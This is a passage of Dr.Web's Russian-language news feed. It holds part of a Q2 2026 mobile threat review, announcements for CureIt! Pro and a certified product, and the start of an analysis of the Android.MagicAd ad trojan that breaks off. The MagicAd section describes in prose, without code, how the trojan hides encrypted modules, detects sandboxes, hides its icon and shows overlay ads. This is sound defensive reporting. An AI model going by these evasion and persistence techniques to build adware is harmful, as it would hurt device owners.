&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.Click&amp;lng=ru"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование вредоносных модов мессенджера WhatsApp, которые незаметно для пользователя могут загружать различные сайты в фоновом режиме.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.675.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4236&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Троянская программа для показа навязчивой рекламы. Представители семейства &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; часто распространяются под видом безобидных приложений и, в некоторых случаях, устанавливаются в системный каталог другим вредоносным ПО. Попадая на Android-устройства, такие рекламные трояны обычно скрывают от пользователя свое присутствие в системе — например, «прячут» значок приложения из меню главного экрана.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Banker.Mamont.80.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Банковский троян, который перехватывает СМС с одноразовыми кодами от кредитных организаций, содержимое уведомлений, а также собирает другую конфиденциальную информацию. Она включает технические данные о зараженном устройстве, список установленных приложений, информацию о СИМ-карте, телефонных звонках, поступивших и отправленных СМС.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.FakeApp&amp;lng=ru"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Троянская программа, которая загружает указанный в ее настройках веб-сайт. Известные модификации этого вредоносного приложения загружают сайт онлайн-казино.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/02_unwanted_q2_2026_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/02_unwanted_q2_2026_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.FakeAntiVirus&amp;lng=ru"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.FakeAntiVirus&amp;lng=ru"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.FakeAntiVirus&amp;lng=ru"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.FakeAntiVirus&amp;lng=ru"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование рекламных программ, которые имитируют работу антивирусного ПО. Такие программы могут сообщать о несуществующих угрозах и вводить пользователей в заблуждение, требуя оплатить покупку полной версии.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.FakeMoney&amp;lng=ru"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование приложений, якобы позволяющих зарабатывать на выполнении тех или иных действий или заданий. Эти программы имитируют начисление вознаграждений, причем для вывода «заработанных» денег требуется накопить определенную сумму. Обычно в них имеется список популярных платежных систем и банков, через которые якобы возможно вывести награды. Но даже когда пользователям удается накопить достаточную для вывода сумму, обещанные выплаты не поступают. Этой записью также детектируется другое нежелательное ПО, основанное на коде таких программ.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/03_riskware_q2_2026_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/03_riskware_q2_2026_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Tool.Obfuscator.TrashCode&amp;lng=ru"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Tool.Obfuscator.TrashCode&amp;lng=ru"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование Android-программ, в которые при помощи хакерских инструментов для моддинга приложений добавлен мусорный код. Такая модификация выполняется с целью запутывания логики программ. Эта техника часто встречается в банковских троянах и в пиратских версиях ПО.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование Android-приложений, модифицированных при помощи утилиты NP Manager. Эта утилита содержит модули для обфускации и защиты кода программ, а также обхода проверки их цифровой подписи после модификации. Добавляемая ей обфускация часто используется во вредоносном ПО для затруднения его детектирования и анализа.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Tool.LuckyPatcher&amp;lng=ru"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Утилита, позволяющая модифицировать установленные Android-приложения (создавать для них патчи) с целью изменения логики их работы или обхода тех или иных ограничений. Например, с ее помощью пользователи могут попытаться отключить проверку root-доступа в банковских программах или получить неограниченные ресурсы в играх. Для создания патчей утилита загружает из интернета специально подготовленные скрипты, которые могут создавать и добавлять в общую базу все желающие. Функциональность таких скриптов может оказаться в том числе и вредоносной, поэтому создаваемые патчи могут представлять потенциальную опасность.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/04_adware_q2_2026_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/04_adware_q2_2026_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Adware.Bastion&amp;lng=ru"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование программ-оптимизаторов, которые периодически создают уведомления с вводящими в заблуждение сообщениями якобы о нехватке памяти и ошибках системы с целью показывать рекламу во время «оптимизации».&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Opensite.15&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Приложения, выдаваемые за чит-инструменты для получения ресурсов в играх. На самом деле они созданы для демонстрации рекламы. Эти программы получают с удаленного сервера конфигурацию, в соответствии с которой загружают целевой сайт с объявлениями — баннерами, всплывающими окнами, видеороликами и т. д.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Adware.AdPush&amp;lng=ru"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Рекламный модуль, который может быть интегрирован в Android-программы. Он демонстрирует рекламные уведомления, вводящие пользователей в заблуждение. Например, такие уведомления могут напоминать сообщения от операционной системы. Кроме того, этот модуль собирает ряд конфиденциальных данных, а также способен загружать другие приложения и инициировать их установку.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Adware.Fictus&amp;lng=ru"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Рекламный модуль, который злоумышленники встраивают в версии-клоны популярных Android-игр и программ. Его интеграция в программы происходит при помощи специализированного упаковщика net2share. Созданные таким образом копии ПО распространяются через различные каталоги приложений, и после установки демонстрируют нежелательную рекламу.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Adware.Airpush&amp;lng=ru"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Программные модули, встраиваемые в Android-приложения и демонстрирующие разнообразную рекламу. В зависимости от версии и модификации это могут быть рекламные уведомления, всплывающие окна или баннеры. С помощью данных модулей злоумышленники часто распространяют вредоносные программы, предлагая установить то или иное ПО. Кроме того, такие модули передают на удаленный сервер различную конфиденциальную информацию.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Угрозы в Google Play&lt;/h3&gt;

&lt;p&gt;В течение II квартала 2026 года вирусные аналитики компании «Доктор Веб» обнаружили в каталоге Google Play несколько новых троянских программ &lt;a href="https://vms.drweb.ru/search/?q=Android.Subscription&amp;lng=ru"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;, подписывающих пользователей на платные услуги. Они распространялись под видом разнообразного ПО: онлайн-кинотеатра ShowLounge - TV &amp; Dramas (&lt;a href="https://vms.drweb.ru/search/?q=Android.Subscription&amp;lng=ru"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.25&lt;/b&gt;), программы для геймеров AIM: Crosshair Asist (&lt;a href="https://vms.drweb.ru/search/?q=Android.Subscription&amp;lng=ru"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.26&lt;/b&gt;), игры True Cargo Drive (&lt;a href="https://vms.drweb.ru/search/?q=Android.Subscription&amp;lng=ru"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.27&lt;/b&gt;), утилиты Battery 3D: Charge Effects (&lt;a href="https://vms.drweb.ru/search/?q=Android.Subscription&amp;lng=ru"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.28&lt;/b&gt;) и редактора изображений PixStudio - Photo Editor (&lt;a href="https://vms.drweb.ru/search/?q=Android.Subscription&amp;lng=ru"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.29&lt;/b&gt;). В общей сложности они были загружены по меньшей мере 2 600 000 раз.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/05_Android.Subscription.26_GP.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/05_Android.Subscription.26_GP.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/06_Android.Subscription.29_GP.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/06_Android.Subscription.29_GP.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Примеры троянских программ &lt;b&gt;Android.Subscription&lt;/b&gt;, выявленных в Google Play во II квартале 2026 года&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Вредоносные приложения этого типа загружают веб-сайты, где при помощи технологии Wap Click пользователям подключаются платные мобильные подписки. У потенциальных жертв запрашивается номер мобильного телефона, и после его ввода выполняется попытка активации соответствующих услуг.&lt;/p&gt;

&lt;p&gt;В Google Play вновь распространялись троянские программы &lt;a href="https://vms.drweb.ru/search/?q=Android.Joker&amp;lng=ru"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, которые тоже подписывают жертв на платные услуги. Злоумышленники выдавали их за мессенджеры Chat Messages (&lt;a href="https://vms.drweb.ru/search/?q=Android.Joker&amp;lng=ru"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2625&lt;/b&gt;) и Easy Messages (&lt;a href="https://vms.drweb.ru/search/?q=Android.Joker&amp;lng=ru"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2632&lt;/b&gt;), а также утилиты для оптимизации работы системы Smart File Cleaner, Junk Clean Master и Fast Cleaner (&lt;a href="https://vms.drweb.ru/search/?q=Android.Joker&amp;lng=ru"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2614&lt;/b&gt;, &lt;a href="https://vms.drweb.ru/search/?q=Android.Joker&amp;lng=ru"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2618&lt;/b&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Android.Joker&amp;lng=ru"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2626&lt;/b&gt; соответственно).&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/07_Android.Joker.2632_1_Easy_Messages.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/07_Android.Joker.2632_1_Easy_Messages.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Одно из вредоносных приложений, в которых скрывались трояны семейства &lt;b&gt;Android.Joker&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Для защиты Android-устройств от вредоносных и нежелательных программ пользователям следует установить антивирусные продукты Dr.Web для Android.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q2%202026%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15266&amp;lng=ru</guid><title>Дождались! Dr.Web CureIt! Pro выпущена и доступна бесплатно для всех</title><link>https://news.drweb.ru/show/?i=15266&amp;lng=ru&amp;c=5</link><pubDate>Tue, 23 Jun 2026 12:13:04 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Встречайте Dr.Web CureIt! Pro — расширенную версию легендарной лечащей утилиты. Прямо сейчас вы можете получить к ней промодоступ совершенно бесплатно.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Как получить Dr.Web CureIt! Pro бесплатно&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;Для новых пользователей.&lt;/strong&gt; Зайдите на сайт&lt;a href="https://free.drweb.ru/download+cureit+free/?utm_source=drweb_site&amp;amp;utm_medium=news&amp;amp;utm_campaign=cireitpro"&gt; free.drweb.ru&lt;/a&gt;. Заполните стандартную форму на получение обычного Dr.Web CureIt!, и получите ссылку на скачивание Dr.Web CureIt! Pro с лицензией на 1 день.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Для действующих пользователей платной версии Dr.Web CureIt!.&lt;/strong&gt; Зайдите в свой Личный кабинет, в нем доступен для скачивания дистрибутив Dr.Web CureIt! Pro. Загружайте и пользуйтесь без ограничений в течение всего периода действия вашей лицензии.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Напоминаем, что Pro-версия дает вам гибкие настройки проверки, управление исключениями, ручное назначение действий для угроз и расширенную статистику.&lt;/p&gt;&lt;p&gt;Обратите внимание! Бесплатный промодоступ на 1 день через сайт &lt;a href="https://free.drweb.ru/download+cureit+free/?utm_source=drweb_site&amp;amp;utm_medium=news&amp;amp;utm_campaign=cireitpro"&gt;free.drweb.ru&lt;/a&gt; — это специальное предложение, которое позволяет оценить все преимущества Pro-версии. Предложение действует до 30 июня 2026 года включительно.&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;С 1 июля 2026 года будут доступны:&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Классическая бесплатная версия Dr.Web CureIt! для скачивания и экстренного лечения;&lt;/li&gt;&lt;li&gt;Расширенная версия утилиты Dr.Web CureIt! Pro. Стоимость: 1 день — 10 рублей, 5 дней — 50 рублей, 10 дней — 100 рублей.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Остались вопросы или заметили нештатное поведение программы? Ваше мнение очень важно для нас. Пишите замечания и пожелания в &lt;a href="https://forum.drweb.com/index.php?showforum=91"&gt;специальный топик&lt;/a&gt; на нашем официальном форуме.&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Скачайте Dr.Web CureIt! Pro уже сегодня и полностью контролируйте процесс лечения при помощи расширенных настроек!&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15268&amp;lng=ru</guid><title>Dr.Web CureIt! станет еще удобнее. Анонс расширенной Pro-версии</title><link>https://news.drweb.ru/show/?i=15268&amp;lng=ru&amp;c=5</link><pubDate>Wed, 10 Jun 2026 10:31:19 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Мы проанализировали обратную связь от наших пользователей и пришли к важному выводу. В критический момент, когда компьютер заражен, не требуются сложные настройки — необходимо быстрое, легкое и надежное решение, которое запустится и вылечит систему одной кнопкой.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Поэтому мы пересмотрели принципы работы с утилитой. Классический бесплатный Dr.Web CureIt! остается с вами, но становится еще более сфокусированным на главном: просто скачайте, нажмите «Проверить» — и все. Это молниеносный надежный сканер для экстренного лечения, способный обезвредить активные угрозы и вылечить систему.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;А для тех, кому нужен контроль над процессом?&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Мы не стали убирать расширенные возможности. Наоборот, мы собрали их в отдельный продукт — Dr.Web CureIt! Pro — и сделали его удобнее и доступнее. Если вам нужно проверить съемный носитель, исключить папки из сканирования или настроить применение автоматических действий к обнаруженным угрозам — вы получаете гибкий, полнофункциональный сканер за минимальные деньги.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Как это будет работать&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Бесплатно и просто — вы скачиваете обычный Dr.Web CureIt! и моментально запускаете экспресс-проверку. Это идеальное решение для ситуаций, когда время дорого.&lt;/li&gt;&lt;li&gt;Если нужно больше — на нашем сайте или прямо из бесплатной версии вы можете приобрести Dr.Web CureIt! Pro и получить доступ ко всем расширенным настройкам.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Таким образом, мы предлагаем осознанный выбор: легкость — бесплатно, максимальная гибкость — за символические 10 рублей в день или 50 рублей за 5 дней и 100 рублей за 10 дней.&lt;/p&gt;&lt;p&gt;Релиз Dr.Web CureIt! Pro состоится уже в начале июля. За неделю до этого мы предоставим всем пользователям бесплатный доступ ко всем возможностям Pro, чтобы вы могли оценить их прежде, чем принимать решение.&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15270&amp;lng=ru</guid><title>Dr.Web Mobile Security Suite (Аврора) сертифицирован ФСТЭК до 2030 года</title><link>https://news.drweb.ru/show/?i=15270&amp;lng=ru&amp;c=5</link><pubDate>Tue, 09 Jun 2026 12:51:47 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Компания «Доктор Веб» сообщает о выпуске обновлений для ранее сертифицированного программного изделия Dr.Web Mobile Security Suite (Аврора). &lt;a href="https://company.drweb.ru/licenses_and_certificates/fstek/"&gt;Сертификат соответствия ФСТЭК России № 4909&lt;/a&gt; действует до февраля 2030 года.&amp;nbsp;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;В рамках пройденного инспекционного контроля ранее сертифицированные дистрибутивы были обновлены до последних актуальных версий.&amp;nbsp;&lt;/p&gt;&lt;p&gt;Напоминаем пользователям сертифицированных версий, что ПО необходимо обновить до актуальной сертифицированной версии. Новые дистрибутивы доступны в Мастере скачиваний. Вы можете самостоятельно скачать сертифицированную версию только при наличии серийного номера, сгенерированного для Dr.Web Mobile Security Suite (Аврора) как для сертифицированного продукта, либо обратиться в &lt;a href="https://support.drweb.ru/"&gt;Службу технической поддержки&lt;/a&gt; с запросом на обновление.&lt;/p&gt;&lt;p&gt;Сертифицированная версия Dr.Web Mobile Security Suite для ОС Аврора защищает мобильные устройства и планшеты, работающие на российской мобильной ОС Аврора, от всех типов вредоносных программ, обеспечивая комплексную защиту устройств, с использованием всех доступных возможностей операционной системы.&lt;br&gt;ОС Аврора используется в крупных государственных компаниях и организациях и является доверенной – это означает, что организация, сотрудники которой работают со смартфонами и планшетами под управлением ОС Аврора, обладает полным контролем над этими устройствами и хранящимися на них данными.&lt;/p&gt;&lt;p&gt;Напоминаем, что поставки лицензий на сертифицированные продукты Dr.Web сопровождаются полным комплектом сертификационных материалов.&lt;/p&gt;&lt;p&gt;По вопросам приобретения продуктов Dr.Web обращайтесь к партнерам или к специалистам &lt;a href="https://support.drweb.ru/"&gt;Службы поддержки продаж «Доктор Веб»&lt;/a&gt;.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15262&amp;lng=ru</guid><title>Троян Android.MagicAd показывает рекламу вопреки всем ограничениям</title><link>https://news.drweb.ru/show/?i=15262&amp;lng=ru&amp;c=5</link><pubDate>Thu, 04 Jun 2026 16:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Специалисты антивирусной лаборатории компании «Доктор Веб» обнаружили троянскую программу Android.MagicAd, которая различными способами обходит ограничения ОС&amp;nbsp;Android и&amp;nbsp;показывает рекламу при работе в&amp;nbsp;фоне. Один из&amp;nbsp;этих методов является универсальным, другие рассчитаны на&amp;nbsp;устройства определенных производителей. Среди них&amp;nbsp;&amp;mdash; эксплуатация сторонних приложений, а&amp;nbsp;также использование системного медиаплеера.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; распространялся через официальный каталог приложений для устройств Xiaomi GetApps и&amp;nbsp;скрывался в&amp;nbsp;более чем 50&amp;nbsp;различных играх и&amp;nbsp;программах. Они появлялись в&amp;nbsp;магазине на&amp;nbsp;короткий срок&amp;nbsp;&amp;mdash; чаще всего до&amp;nbsp;месяца, после чего пропадали, и&amp;nbsp;вместо них появлялись новые. Возможно, таким образом злоумышленники пытались защитить &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; от&amp;nbsp;преждевременного обнаружения, сохранив при этом его активность: после удаления из&amp;nbsp;магазина троянские программы продолжают оставаться на&amp;nbsp;устройствах пользователей и&amp;nbsp;могут и&amp;nbsp;дальше выполнять вредоносную деятельность. В&amp;nbsp;настоящее время ни&amp;nbsp;одно из&amp;nbsp;выявленных нами приложений с&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;не доступно для загрузки в&amp;nbsp;каталоге GetApps, а&amp;nbsp;у&amp;nbsp;распространявших их&amp;nbsp;разработчиков перестали появляться новые программы с&amp;nbsp;трояном.&lt;/p&gt;

&lt;p&gt;Проведенное вирусными аналитиками &amp;laquo;Доктор Веб&amp;raquo; исследование показало, что первые версии &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; появились в&amp;nbsp;2025 году и&amp;nbsp;помимо каталога GetApps также встречались в&amp;nbsp;Samsung Galaxy Store.&lt;/p&gt;

&lt;div class="img img-two"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/01_Android.MagicAd_store_1.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/01_Android.MagicAd_store_1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/02_Android.MagicAd_store_2.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/02_Android.MagicAd_store_2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Примеры игр и&amp;nbsp;программ из&amp;nbsp;каталога GetApps, в&amp;nbsp;которых скрывался Android.MagicAd.1. На&amp;nbsp;момент публикации нашей новости эти и&amp;nbsp;другие модификации трояна стали недоступны для скачивания&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Часть вредоносной функциональности &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; находится в&amp;nbsp;dex-модулях, которые скрыты в&amp;nbsp;зашифрованных нативных библиотеках в&amp;nbsp;каталоге с&amp;nbsp;файловыми ресурсами трояна. В&amp;nbsp;процессе работы он&amp;nbsp;расшифровывает эти библиотеки, извлекает из&amp;nbsp;них свои компоненты и&amp;nbsp;запускает.&lt;/p&gt;

&lt;p&gt;Прежде чем приступить к&amp;nbsp;демонстрации рекламы, троян выполняет ряд проверок, чтобы убедиться, что его окружение является безопасным. Например, он&amp;nbsp;ищет признаки работы в&amp;nbsp;виртуальной среде, проверяет, была&amp;nbsp;ли его установка органической, нет&amp;nbsp;ли IP-адреса зараженного устройства в&amp;nbsp;его черном списке и&amp;nbsp;т.&amp;nbsp;д.&lt;/p&gt;

&lt;p&gt;Если &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;не обнаруживает подозрительную активность, он&amp;nbsp;скрывает свой значок из&amp;nbsp;списка программ в&amp;nbsp;меню главного экрана. Затем он&amp;nbsp;создает канал уведомлений, через который запускает несколько вредоносных сервисов постоянного присутствия, необходимых для работы в&amp;nbsp;фоновом режиме при закрытом окне вредоносного приложения. Далее через планировщик задач &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; создает задание, которое периодически перезапускает сервисы, проверяющие работу канала уведомлений и&amp;nbsp;при необходимости запускающие его вновь. Кроме того, при работе на&amp;nbsp;устройствах с&amp;nbsp;относительно старыми версиями ОС&amp;nbsp;Android троян запускает виртуальный экран, чтобы работа одного из&amp;nbsp;его компонентов не&amp;nbsp;прерывалась системой.&lt;/p&gt;

&lt;p&gt;Чтобы показывать рекламу в&amp;nbsp;фоновом режиме, когда его окно закрыто, &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; применяет ряд методик, выбираемых на&amp;nbsp;основе производителя зараженного устройства. При этом они реализуются без явного запроса системного разрешения &lt;span class="string"&gt;SYSTEM_ALERT_WINDOW&lt;/span&gt;, которое позволяет приложению отображаться поверх других программ.&lt;/p&gt;

&lt;p&gt;Независимо от&amp;nbsp;применяемого способа, все рекламные баннеры загружаются в&amp;nbsp;виде полупрозрачной активности (Translucent Activity), что дает возможность трояну отрисовывать их&amp;nbsp;поверх существующих окон.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/03_Android.MagicAd_banner1.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/03_Android.MagicAd_banner1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/04_Android.MagicAd_banner2.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/04_Android.MagicAd_banner2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;

    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/05_Android.MagicAd_banner3.png" data-fancybox=""&gt;
